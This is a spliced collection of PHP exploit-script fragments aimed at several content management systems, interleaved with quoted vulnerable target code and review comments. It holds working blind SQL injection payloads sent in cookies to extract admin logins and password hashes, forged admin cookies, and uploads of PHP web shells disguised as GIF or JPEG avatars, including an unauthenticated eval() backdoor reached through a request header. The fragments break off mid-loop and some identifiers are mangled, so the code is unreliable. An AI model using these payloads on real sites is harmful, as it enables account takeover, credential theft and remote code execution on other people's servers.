} // closes a scope that is opened before this chunk

// --- Parameters ---------------------------------------------------------
// Mandatory (second getparam() argument = 1): target base URL, the login /
// password of an account on the target, an e-mail address (echoed back in
// the profile form) and the local file to upload. "id" (member id) is
// optional; when absent it is scraped from the login response below.
$url = getparam("url", 1);
$login = getparam("login", 1);
$pass = getparam("pass", 1);
$email = getparam("email", 1);
$file = getparam("file", 1);
$id = getparam("id");

// Bytes of the local file that will be uploaded as the "avatar".
// NOTE(review): the `@` hides the warning on an unreadable path, so the
// length check below is the only error signal (a 1-byte file is rejected
// too, and a read failure is reported as "don't exist").
$source = @file_get_contents($file);
if (strlen($source) < 2) {
    exit("{$file} don't exist.\n");
}

// Authenticate against the target's login form (sql_pseudo / sql_pass).
$xpl = new phpsploit();
$s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}");

//Cookies
// Login is considered successful when the response sets a PHPSESSID cookie
// and no longer contains the login form field (name="sql_pseudo").
// The cookies replayed afterwards carry the account name and the unsalted
// md5 of the password (sql_pass) — anyone able to read these cookies gets
// an offline-crackable hash.
if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) {
    $xpl->addcookie("PHPSESSID", $phpsessid[1]);
    $xpl->addcookie("sql_pseudo", $login);
    $xpl->addcookie("sql_pass", md5($pass));
    $xpl->addcookie("auto", "off");
    print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
    exit("[*] Can't log in\n");
}

//Id
// Recover the member id from the profile link of the logged-in page
// ("Voir son profil" = "View profile"; the link text is the login).
// NOTE(review): $login is interpolated into the pattern without
// preg_quote(), and nothing checks that the regex matched — on failure
// $id_member[1] is undefined, $id ends up empty and the profile update
// below is still attempted.
if (!isset($id)) {
    preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member);
    $id = $id_member[1];
}
print "[*] Id : {$id}\n";

//Upload
// Multipart body for the "modify profile" form. The local file is sent as
// userfile[] with a .jpg name and an image/jpeg content type whatever its
// real content — the upload relies on the server trusting the
// client-supplied name/type. The frmdt_* keys are bare constants that are
// presumably provided by the phpsploit class (not visible here). The
// request that sends this body is issued after this chunk ends.
$formdata = array(
    frmdt_url => $url . '/index.php?mod=espace_membre&ac=profil',
    'action' => 'modifier',
    'ok' => '1',
    'id' => $id,
    'pseudo' => $login,
    'sql_newNom' => $login,
    'sql_newMail' => $email,
    'MAX_FILE_SIZE' => '2097152',
    'valider' => ' Modifier mon profil',
    'userfile[]' => array(frmdt_type => 'image/jpeg', frmdt_filename => 'test.jpg', frmdt_content => $source)
);
// Fetch the file whose path was captured (before this chunk) in
// $matches[1], rewriting a leading "./" into "/", and dump the first five
// `name='value';` assignments found in it (the enclosing blocks are opened
// before this chunk).
$xpl->get($url . str_replace("./", "/", $matches[1]));
preg_match_all("#(.*)='(.*)';#", $xpl->getcontent(), $vars);
for ($z = 0; $z <= 4; $z++) {
    print "\nsploit> " . strtolower($vars[1][$z]) . " -> " . $vars[2][$z];
}
}
}

// --- Blind (boolean) SQL injection through the "fid" cookie ---------------
// Oracle: forum.php answers with an empty <TITLE></TITLE> when the injected
// condition is false; any other title is read as "true". Each iteration
// re-sets the "fid" cookie (addcookie() with the same name presumably
// replaces the previous value) and re-requests forum.php.
// The payload starts with "-1 OR", so fid appears to be used unquoted in the
// target's query (inferred from the payload, not visible here).
print "\nstatus> Trying to get the administrator login/passwd";
$headers = array("Username", "Password");   // labels used in the output
$fields = array("login", "passwd");         // atk_users columns to extract
$value = $length = array();
for ($a = 0; $a < 2; $a++) {
    // Step 1: length of the value, one decimal digit at a time.
    // $b = 1..2 -> at most a two-digit length is handled;
    // $c = 48..57 -> the ASCII digits '0'..'9'.
    // The subquery takes the first row whose `admin` column is truthy.
    // NOTE(review): a digit position that never matches is silently
    // skipped (no error), and `.=` on an unset array slot raises a notice.
    print "\nsploit> " . $headers[$a] . " length ";
    for ($b = 1; $b < 3; $b++) {
        for ($c = 48; $c <= 57; $c++) {
            $xpl->addcookie("fid", "-1%20OR%20SUBSTR(LENGTH((SELECT%20" . $fields[$a] . "%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201)),{$b},1)=CHAR({$c})");
            if (!preg_match("#<TITLE></TITLE>#i", $xpl->getcontent($xpl->get($url . "forum.php")))) {
                $length[$a] .= chr($c);
                print chr($c);
                break;
            }
        }
    }
    // Step 2: each character of the value. Both sides are wrapped in HEX(),
    // presumably so a case-insensitive collation cannot make two different
    // bytes compare equal. $e = 0..128 — 128 is one past the 7-bit range;
    // bytes above 0x80 are not searched, and a character with no match is
    // silently dropped (the loop body is cut off by the end of this chunk).
    print "\nsploit> " . $headers[$a] . " -> ";
    for ($d = 1; $d <= $length[$a]; $d++) {
        for ($e = 0; $e <= 128; $e++) {
            $xpl->addcookie("fid", "-1%20OR%20HEX(SUBSTR((SELECT%20" . $fields[$a] . "%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201),{$d},1))=HEX(CHAR({$e}))");
            if (!preg_match("#<TITLE></TITLE>#i", $xpl->getcontent($xpl->get($url . "forum.php")))) {
                $value[$a] .= chr($e);
                print chr($e);
                break;
# 71. list($AIpass, $Xsuper_admintest)=mysql_fetch_row($result);
# 72. if (md5($AIpass) == $AIpwd and $AIpass != "") {
# 73. $admintest = true;
# 74. $super_admintest = $Xsuper_admintest;
# 75. } else {
# 76. Admin_Alert("Password in Cookies not Good #1 : $aid / $AIpwd | ");
# 77. }
# 78. }
# 79. unset ($AIpass);
# 80. unset ($AIpwd);
# 81. unset ($Xadmin);
# 82. unset ($Xsuper_admintest);
# 83. }
#
# Review note on the target code quoted above (lines 71-83): the admin check
# compares md5(<stored password>) with the value taken from the cookie
# ($AIpwd), so knowing the md5 of the password is enough to be treated as
# admin in these lines (what precedes line 71 is not quoted). The comparison
# is a loose `==`: in PHP two strings that both look numeric (e.g. "0e"
# followed only by digits) are compared as numbers.

// Forge the admin cookie: base64("<admin id>:<md5(password)>"), URL-encoded.
// $aid[1] / $pwd[1] are captures made earlier in the script (not in this
// chunk).
// NOTE(review): `$c*k` is not a valid PHP variable name (it parses as
// `$c * k`); the identifier looks mangled in this copy of the script —
// restore it from the original source before running this.
$c*k = urlencode(base64_encode($aid[1] . ':' . md5($pwd[1])));
$xpl->addcookie('admin', $c*k);
print "\nAdmin_cookie: admin={$c*k}\n\$shell> ";

# +admin/settings.php (CODE EXECUTION)
# |
# 758. switch($op) {
# 763. case "ConfigSave":
# 764. include("admin/settings_save.php");
# 765. ConfigSave($xparse,$xsitename,$xnuke_url,$xsite_logo,$xslogan,$xstartdate,$xadminmail,
# $xtop,$xstoryhome,$xoldnum,$xultramode,$xanonpost,$xDefault_Theme,$xbanners,$xmyIP,
# $xfoot1,$xfoot2,$xfoot3,$xfoot4,$xbackend_title,$xbackend_language,$xbackend_image,
# $xbackend_width,$xbackend_height,$xlanguage,$xlocale,$xperpage,$xpopular,$xnewlinks,
# $xtoplinks,$xlinksresults,$xlinks_anonaddlinklock,$xnotify,$xnotify_email,$xnotify_subject,
# $xnotify_message,$xnotify_from,$xmoderate,$xcommentlimit,$xanonymous,$xmaxOptions,$xBarScale,
# $xsetCookies,$xtipath,$xuserimg,$xadminimg,$xadmingraphic,$xsite_font,$xadmart,$xminpass,
# $xhttpref,$xhttprefmax,$xpollcomm,$xlinkmainlogo,$xstart_page,$xsmilies,$xOnCatNewLink,
# $xEmailFooter,$xshort_user,$xgzhandler,$xrss_host_verif,$xcache_verif,$xmember_list,
// --- Connection options ---------------------------------------------------
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}

// --- Recover the admin's credentials --------------------------------------
// blind() is a helper defined elsewhere in the script (not visible here); it
// is given the column name to extract. The password comes back as a hash
// (the prompt calls it "Admin hash") and is lower-cased before use.
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));

// The target's auth cookie is "<userID>:<password hash>" (":" sent as %3A),
// so the hash alone is enough to act as the admin — no cracking needed.
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);

# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
# Review note on the quoted lines: the destination name is the
# client-supplied upload name unchanged (line 71) and the only gate shown is
# isfileadmin() (line 44). Lines 45, 47-68 and 70 are omitted from the quote,
# so any extension/type filter would have to live there — check the real
# file before relying on this.

// Multipart request for the "save" action. The local file keeps its own base
// name on the server (see line 71 above); the request is sent after this
// chunk ends. $url and $file are set before this chunk.
// NOTE(review): the result of file_get_contents($file) is not checked — an
// unreadable $file silently sends an empty upload.
print "\nTrying to upload the malicious file";
$frmdt = array(
    frmdt_url => $url . 'index.php?site=files&action=save',
    "fileurl" => 1,
    "upfile" => array(frmdt_filename => basename($file), frmdt_content => file_get_contents($file))
);
# `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
# '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
# '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
# '".$nsnst_const['remote_port']."', '".$nsnst_const['client_ip']."'" is not repeated here — see the original
# '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')");
#
# We insert a row in $prefix."_nsnst_tracked_ips".
#
# (Review note: the quoted INSERT concatenates request-derived values such as
# client_ip, user_agent and the referer straight into the SQL string. The
# request below only uses a fixed Client-IP value, apparently just to get a
# tracked-IP row created; the injection used afterwards goes through the
# "admin" cookie.)

// Create one tracked-IP row for us; the Client-IP header is presumably what
// ends up in $nsnst_const['client_ip'] above.
// NOTE(review): the message interpolates $prfix while the comment above says
// $prefix — probably a typo in the output string (display only).
print "\nInserting a row in {$prfix}_nsnst_tracked_ips";
$xpl->addheader("Client-IP", "255.255.255.255");
$xpl->get($url . 'index.php');

# Trying to find a valid tid.
# Needed for $tum > 0.
#
// Walk tid values from $tid up to $nbtst (both set before this chunk) with an
// "admin" cookie whose first field is a SQL tautology (base64 of
// colon-separated fields, the layout the target's admin cookie seems to use;
// the value is the same for every request). A response whose headers do NOT
// mention phpnuke.org is taken as "valid tid" — the failure case is
// presumably a redirect there, which is not visible in this chunk.
print "\nTrying to find a valid tid (max hits={$nbtst})";
$sql = "' OR 1=1#";
$xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:')));
for ($c = $tid; $c <= $nbtst; $c++) {
    $xpl->get($url . "includes/nsbypass.php?tid={$c}");
    if (!preg_match("#phpnuke.org#", $xpl->getheader())) {
        $tid = $c;
        print "\nValid tid found: {$tid}\nHash: {$login} -> ";
        break;
    }
    if ($c == $nbtst) {
        exit("\n#1 Exploit failed");
    }
}

# MD5 hash length [32]
#
// Per-character extraction of a 32-hex-digit md5; the loop body continues
// past the end of this chunk.
for ($a = 1; $a <= 32; $a++) {
# MD5 charset [a-f0-9]
print " by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";

// Usage: -url is mandatory, so fewer than 3 argv entries (script name, -url,
// value) means no target was given.
if ($argc < 3) {
    print "usage: php phptn_exploit.php -url <url> [options]\n\n";
    print " Options: -mode 0 -> Remote Upload (default)\n";
    print " 1 -> Remote Code Execution\n";
    print " -proxy If you want to use a proxy.\n";
    exit;
}

$url = getparam("url", 1);
// "-mode 0" and no -mode both give 0 ("0" is falsy in PHP).
// NOTE(review): the `$mode == 0` test below is a loose comparison; on PHP
// older than 8 any non-numeric string also equals 0, so a mistyped mode
// silently selects the upload payload.
$mode = getparam("mode") ? getparam("mode") : 0;
$prx = getparam("proxy");
$xpl = new phpsploit();
if ($prx) {
    $xpl->proxy($prx);
}
// Cookie sent with every request; what the target does with grade[a] is not
// visible in this chunk.
$xpl->addcookie("grade[a]", "a");

/* Code in the fake avatar */
if ($mode == 0) {
    // Mode 0: the "avatar" is a PHP stager. When a request carries an
    // "Upload:" header it writes w00t.php — a minimal upload form: POST
    // "upload" moves the file into the current directory under its original
    // name, POST "d" unlink()s w00t.php itself — and prints "upfiledone".
    // It then includes include/files/accueil.php (presumably the site's
    // normal page, so the avatar URL still renders).
    $file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
    // preg_replace() backslash-escapes every single quote so the form code
    // can sit inside the single-quoted fputs() argument of the stager.
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
    // Mode 1: eval() of the raw "Shell:" request header, preceded by the
    // literal 123456789 so the client can cut the output out of the page
    // (the client side is outside this chunk). Anyone who can send that
    // header gets code execution — the backdoor has no authentication.
    // NOTE(review): exit(123456789) uses the integer as the exit status and
    // prints nothing, so no closing marker is emitted — check what the
    // client-side parser expects. The bare HTTP_SHELL constant relies on the
    // undefined-constant-to-string fallback, which is an Error on PHP 8.
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}

/* Upload avatar with PHP c0de */
// The payload goes through the avatar-modification form as "1.gif" with an
// image/gif content type. Success is detected by a
// location.href='?page=avatars&id=N&mode=J' redirect in the response.
print " * uploading avatar\t";
$avatar = array(
    frmdt_url => $url . '?page=avatars&op=modify',
    'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de),
    'id' => 1,
    'mode' => 'J',
    'avatarurl' => '',
    'avatarremoteurl' => '',
    'MAX_FILE_SIZE' => 999999
);
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
    print "done\n";
} else {
    die("error\n");
}
// Admin session obtained (the branch starts before this chunk): report it and
// hand over to finalattack(), defined elsewhere in the script.
print " SID -> {$admin_sid}\n";
print " UID -> {$admin_uid}\n";
finalattack($admin_sid, $admin_uid);
} else {
    exit("[*] Can't log in\n");
}
} else {
    /* User account defined */
    // Optional "login:passwd" account used to reach pages that need a session.
    // NOTE(review): explode(":") + list() keeps only the first two pieces, so
    // a password containing ":" is silently truncated.
    if ($acc) {
        print "[*] Using user account {$acc}\n";
        list($login, $passwd) = explode(":", $acc);
        $xpl->addheader("Referer", $url);
        // Credentials are placed in the POST body as-is (no urlencode()).
        $c = $xpl->post($url . "index.php?file=User&nuked_nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok");
        // Both the session id and the uid must be found in the raw response.
        // NOTE(review): $prefix is dropped into the pattern without
        // preg_quote(), and the "uid=" pattern carries no prefix, so it
        // matches the first "uid=" anywhere in the response.
        if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
            # User Cookies
            $xpl->addcookie("{$prefix}sess_id", $sid[1]);
            $xpl->addcookie("{$prefix}user_id", $uid[1]);
        } else {
            exit("[*] Can't log in\n");
        }
    }

    // Queries to run through the injection (the extraction loop comes after
    // this chunk): a session id of the first level>=9 user ordered by `date`,
    // then the id, login and password of the first level>=9 user. "niveau"
    // is the user-level column; >=9 is presumably the admin level.
    // NOTE(review): only the inner SELECT uses {$prefix}; nuked_sessions and
    // nuked_users are hard-coded, so a non-default table prefix breaks them.
    $queries = array();
    $queries[] = array(" SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1");
    $queries[] = array(" UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $queries[] = array(" Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
    $queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1");

    // The Stats page is fetched with a spoofed X-Forwarded-For of 127.0.0.1
    // (why the target cares is not visible here); a "history.back()" link in
    // the answer is read as the access-denied page.
    $xpl->agent("Mozilla Firefox");
    $xpl->addheader("X-Forwarded-For", "127.0.0.1");
    $ctmp = $xpl->get($url . "index.php?file=Stats&page=visits");
    if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) {
        exit("[*] You don't have rights to access Stats page.\n");
$xpl->get($url);
$xpl->reset('header');
}

// Pull the four values the target leaks into its page: each one is wrapped in
// the marker string $config['3'] followed by an index digit 0-3 (login,
// passwd, user_id, session — see $what). $config is built before this chunk.
// NOTE(review): the values are taken by match ORDER ($matches[2][$i]); the
// captured index digit in $matches[1] is ignored, so the mapping is wrong if
// the markers do not appear in 0..3 order. $config['3'] is also interpolated
// into the pattern without preg_quote().
if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) {
    die("Exploit Failed");
}
$what = array("login", "passwd", "user_id", "session");
for ($i = 0; $i < count($what); $i++) {
    print "\n" . $what[$i] . " -> " . $matches[2][$i];
}
if (empty($matches[2][3])) {
    exit("\nNo session found");
}

# Logged in as admin
// Replay the leaked session: cookie names are "<$config[1]>_<name>". As
// written, both admin_session and user_id receive the user_id
// ($matches[2][2]); only sess_id gets the session value ($matches[2][3]).
$name = array("admin_session", "user_id", "sess_id");
$xpl->addcookie($config[1] . '_' . $name[0], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[1], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[2], $matches[2][3]);

// Upload $config[4] (set before this chunk, presumably the PHP payload) as
// the profile picture "1.jpg" through update_pref, then read the stored file
// name back from the "photo" field of the edit_pref form. $match[1] is used
// after this chunk.
$phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4]));
$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
    exit("\nNo file found");
} else {
    print "\n\$shell> ";
}

// SQL to run later (outside this chunk): changes <prefix>_block.type to
// VARCHAR(60); why that is needed is not visible here. The second statement
// is commented out in the original script.
$sql = array();
$sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
/* $sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/